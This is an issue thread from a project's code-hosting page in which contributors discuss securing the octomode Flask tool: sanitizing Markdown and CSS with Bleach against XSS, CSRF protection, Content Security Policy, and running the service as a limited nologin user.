Labels Milestones

New Issue

Consider security and possible forms of misuse of octomode #2

Open

opened 3 years ago by mb · 7 comments

mb commented 3 years ago

Owner

I will dive into this thread around the Televex project as a start: varia/televex#1

And next to that check Crunk's work on distribusi-verse to see how sanitizing has been done in Flask: https://git.vvvvvvaria.org/crunk/distribusi-verse

I will dive into this thread around the Televex project as a start: https://git.vvvvvvaria.org/varia/televex/issues/1 And next to that check Crunk's work on distribusi-verse to see how sanitizing has been done in Flask: https://git.vvvvvvaria.org/crunk/distribusi-verse

mb commented 3 years ago

Poster

Owner

Small research: XSS attacks is something to be careful with https://en.wikipedia.org/wiki/Cross-site_scripting.

About sanitizing Markdown in combination with Mozilla's HTML Bleach python library: https://github.com/Python-Markdown/markdown/issues/392

Bleach, by Mozilla: https://github.com/mozilla/bleach

What is a good CSS sanitizer? Crunk:

Ik zat te kijken naar tinycss of bleach
Ja, maar volgens mij kan je bleach dus ook voor css gebruiken
Je wil vooral niet de browser van iemand anders, css als het of Javascript laten werken

On top of sanitizing the Markdown and CSS, would it be needed to add something like Talisman to configure Content Security Policy settings and things like that?

Small research: XSS attacks is something to be careful with https://en.wikipedia.org/wiki/Cross-site_scripting. About sanitizing Markdown in combination with Mozilla's HTML Bleach python library: https://github.com/Python-Markdown/markdown/issues/392 Bleach, by Mozilla: https://github.com/mozilla/bleach What is a good CSS sanitizer? Crunk: > Ik zat te kijken naar tinycss of bleach > Ja, maar volgens mij kan je bleach dus ook voor css gebruiken > Je wil vooral niet de browser van iemand anders, css als het of Javascript laten werken On top of sanitizing the Markdown and CSS, would it be needed to add something like [Talisman](https://github.com/GoogleCloudPlatform/flask-talisman#content-security-policy) to configure Content Security Policy settings and things like that?

crunk commented 3 years ago

Both the https://git.vvvvvvaria.org/crunk/distribusi-verse and https://git.vvvvvvaria.org/varia/varia-library-website also have CSRF protection.

More on that here: https://owasp.org/www-community/attacks/csrf

This is mostly when working with flask-wtf and wtforms.

Both the https://git.vvvvvvaria.org/crunk/distribusi-verse and https://git.vvvvvvaria.org/varia/varia-library-website also have CSRF protection. More on that here: https://owasp.org/www-community/attacks/csrf This is mostly when working with flask-wtf and wtforms.

mb commented 3 years ago

Poster

Owner

Logging the following from the infra chat:

I wouldn't worry about someone writing to the pads, since this anyway can always happen if someone knows the pad name
What I am more worried about if a tool can be used to read and write to the server and for example execute arbitrary files
If you for example make a system user with who can not launch a shell who executes this software, things are already much safer
One of the things you can and should do with flask is use their inbuilt methods to serialize and deserialize things like html so that nothing funny can happen there

Here is a thing I bookmarked yesterday with a nice exploit of the kind of stuff I would worry about; https://kaizoku.dev/htb-devoops#heading-gaining-foothold-user-shell

Logging the following from the infra chat: > I wouldn't worry about someone writing to the pads, since this anyway can always happen if someone knows the pad name > What I am more worried about if a tool can be used to read and write to the server and for example execute arbitrary files > If you for example make a system user with who can not launch a shell who executes this software, things are already much safer > One of the things you can and should do with flask is use their inbuilt methods to serialize and deserialize things like html so that nothing funny can happen there > Here is a thing I bookmarked yesterday with a nice exploit of the kind of stuff I would worry about; https://kaizoku.dev/htb-devoops#heading-gaining-foothold-user-shell

rra commented 3 years ago

It should probably also be run as a limited permissions user with a strictly defined set of folders etc that it can read/write to.

It should probably also be run as a limited permissions user with a strictly defined set of folders etc that it can read/write to.

mb commented 3 years ago

Poster

Owner

Would you do that with a chroot? I got confused reading that this involves ssh, and a system user does not use ssh to interact with the server, right?

Would you do that with a `chroot`? I got confused reading that this involves `ssh`, and a system user does not use `ssh` to interact with the server, right?

crunk commented 3 years ago

d5369bc142, I succesfully used bleach in distribusi-verse

https://git.vvvvvvaria.org/crunk/distribusi-verse/commit/d5369bc1420055613a1b49d981c14be2c138b78c, I succesfully used bleach in distribusi-verse

decentral1se commented 3 years ago

Collaborator

Would you do that with a chroot?

Using a chroot is complicated unfortunately... I like the suggestion in varia/octomode#2

If you for example make a system user with who can not launch a shell who executes this software, things are already much safer

So you just do a nologin system user which has no root permissions.

> Would you do that with a chroot? Using a `chroot` is complicated unfortunately... I like the suggestion in https://git.vvvvvvaria.org/varia/octomode/issues/2#issuecomment-725 > If you for example make a system user with who can not launch a shell who executes this software, things are already much safer So you just do a `nologin` system user which has no root permissions.

Sign in to join this conversation.

No Branch/Tag Specified

Branches Tags

master

technodisobedience

Labels

Apply labels

Clear labels

No items

No Label

Milestone

Set milestone

Clear milestone

No items

No Milestone

Projects

Clear projects

No project

Assignees

Assign users

Clear assignees

No Assignees

4 Participants

Notifications

Subscribe

Due Date

The due date is invalid or out of range. Please use the format 'yyyy-mm-dd'.

No due date set.

Dependencies

This issue currently doesn't have any dependencies.

Write Preview

Loading…

Cancel

Save

There is no content yet.